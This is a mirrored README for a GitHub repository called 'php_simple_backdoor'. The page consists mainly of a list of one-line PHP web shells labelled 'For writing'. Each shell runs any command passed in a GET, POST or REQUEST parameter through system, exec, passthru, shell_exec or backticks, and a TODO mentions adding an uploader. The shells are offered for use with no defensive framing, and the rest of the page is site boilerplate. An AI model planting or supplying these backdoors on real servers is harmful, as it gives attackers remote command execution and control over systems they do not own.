Coder Social home page Coder Social logo

php_simple_backdoor's Introduction

php_simple_backdoor

php simple backdoor

TODO

make a uploader

For writing

<?php system($_GET['cmd']);?>
<?php system($_GET['0']);?>
<?php system($_GET['1']);?>
<?php system($_POST['cmd']);?>
<?php system($_POST['0']);?>
<?php system($_POST['1']);?>
<?php system($_REQUEST['cmd']);?>
<?php system($_REQUEST['0']);?>
<?php system($_REQUEST['1']);?>
<?php exec($_GET['cmd']);?>
<?php exec($_GET['0']);?>
<?php exec($_GET['1']);?>
<?php exec($_POST['cmd']);?>
<?php exec($_POST['0']);?>
<?php exec($_POST['1']);?>
<?php exec($_REQUEST['cmd']);?>
<?php exec($_REQUEST['0']);?>
<?php exec($_REQUEST['1']);?>
<?php passthru($_GET['cmd']);?>
<?php passthru($_GET['0']);?>
<?php passthru($_GET['1']);?>
<?php passthru($_POST['cmd']);?>
<?php passthru($_POST['0']);?>
<?php passthru($_POST['1']);?>
<?php passthru($_REQUEST['cmd']);?>
<?php passthru($_REQUEST['0']);?>
<?php passthru($_REQUEST['1']);?>
<?php shell_exec($_GET['cmd']);?>
<?php shell_exec($_GET['0']);?>
<?php shell_exec($_GET['1']);?>
<?php shell_exec($_POST['cmd']);?>
<?php shell_exec($_POST['0']);?>
<?php shell_exec($_POST['1']);?>
<?php shell_exec($_REQUEST['cmd']);?>
<?php shell_exec($_REQUEST['0']);?>
<?php shell_exec($_REQUEST['1']);?>
<?=`$_GET[cmd]`?>
<?=`$_GET[0]`?>
<?=`$_GET[1]`?>
<?=`$_POST[cmd]`?>
<?=`$_POST[0]`?>
<?=`$_POST[1]`?>
<?=`$_REQUEST[cmd]`?>
<?=`$_REQUEST[0]`?>
<?=`$_REQUEST[1]`?>

php_simple_backdoor's People

Contributors

yunolay avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.